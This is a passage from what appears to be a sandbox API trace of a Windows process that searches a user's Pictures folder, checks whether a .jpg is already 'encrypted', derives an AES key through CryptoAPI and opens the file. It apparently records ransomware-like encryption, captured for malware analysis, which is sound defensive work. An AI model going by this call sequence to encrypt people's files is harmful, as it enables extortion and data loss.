wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0040.337] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.337] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.337] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.337] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.337] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.337] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.337] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.337] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4033360, ftCreationTime.dwHighDateTime=0x1d5b808, ftLastAccessTime.dwLowDateTime=0xfcd55950, ftLastAccessTime.dwHighDateTime=0x1d5c28f, ftLastWriteTime.dwLowDateTime=0xfcd55950, ftLastWriteTime.dwHighDateTime=0x1d5c28f, nFileSizeHigh=0x0, nFileSizeLow=0x17ce9, dwReserved0=0x0, dwReserved1=0x777648, cFileName="T4n1IOAv.jpg", cAlternateFileName="")) returned 0x7c20c0 [0040.337] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.337] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.337] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4033360, ftCreationTime.dwHighDateTime=0x1d5b808, ftLastAccessTime.dwLowDateTime=0xfcd55950, ftLastAccessTime.dwHighDateTime=0x1d5c28f, ftLastWriteTime.dwLowDateTime=0xfcd55950, ftLastWriteTime.dwHighDateTime=0x1d5c28f, nFileSizeHigh=0x0, nFileSizeLow=0x17ce9, dwReserved0=0x0, dwReserved1=0x777648, cFileName="T4n1IOAv.jpg", cAlternateFileName="")) returned 0x7c20c0 [0040.337] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.337] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.337] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.337] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.337] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.337] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aCi\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ci\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hhX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hX5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uJXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JXBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XBt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bt\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IOAv.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.339] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.340] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0040.340] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.340] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.340] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.340] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.340] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.340] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.340] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.340] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.340] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.340] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.340] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4033360, ftCreationTime.dwHighDateTime=0x1d5b808, ftLastAccessTime.dwLowDateTime=0xfcd55950, ftLastAccessTime.dwHighDateTime=0x1d5c28f, ftLastWriteTime.dwLowDateTime=0xfcd55950, ftLastWriteTime.dwHighDateTime=0x1d5c28f, nFileSizeHigh=0x0, nFileSizeLow=0x17ce9, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="T4n1IOAv.jpg", cAlternateFileName="")) returned 0x7c2240 [0040.340] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0040.340] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.340] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.340] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0040.340] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0040.340] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.341] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.341] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0040.341] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0040.341] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.342] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0040.342] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.342] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.342] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.342] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.342] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.342] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.342] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0040.342] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0040.342] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.342] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.342] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0040.342] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.342] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.342] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.342] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0040.342] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.342] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.343] CryptDestroyHash (hHash=0x7c2100) returned 1 [0040.343] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\t4n1ioav.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0040.343] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.343] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0040.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0040.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0040.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0040.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0040.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0040.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0040.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0040.343] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0040.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0040.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0040.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0040.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0040.343] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0040.344] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0040.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0040.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 